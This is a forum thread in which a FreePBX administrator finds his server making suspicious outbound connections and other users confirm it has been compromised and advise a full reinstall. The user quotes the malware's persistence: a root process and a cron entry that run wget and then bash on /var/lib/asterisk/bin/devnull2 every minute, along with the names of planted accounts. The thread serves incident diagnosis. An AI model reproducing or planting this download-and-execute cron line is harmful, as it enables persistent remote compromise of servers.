What is the significance of to freepbx?

I am doing some work relating to a new gateway router and perimeter firewall. While checking https connectivity from outside I happened to discover this using netstat:

# netstat -an | grep 80
tcp        0      0 *                   LISTEN      
tcp        0      1              SYN_SENT    
tcp        0      1              SYN_SENT    
tcp        0      1              SYN_SENT  
. . .

My question: What is freebsd doing connecting to that address?

That is malicious traffic specific to FreePBX – your machine has already been compromised.

Had your firewall not blocked it, the script would have retrieved more malicious code.

So I see this:

root 24718 1 0 12:18 ? 00:00:00 /bin/sh -c wget -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

Which is likely the compromise script running. How do I tell where is is running from?

That is interesting. I see this in cron:

*/1  * * * * wget -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

Your system is compromised, as @Stewart1 already said. Your best bet is to wipe and start over. You can attempt to cleanup but you are assuming that you are smarter/more determined than the bad guys.

1 Like

This thread may be useful:

but I strongly agree with @adell4444 – start over.

Which of these are used by FreePBX?


Yes, I see the need to get this fixed with a scrub. But not in the middle of a workday.

sugarmaint supports and supermaint are all known to have been maliciously added. Take a read through the thread that was attached.

1 Like

This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.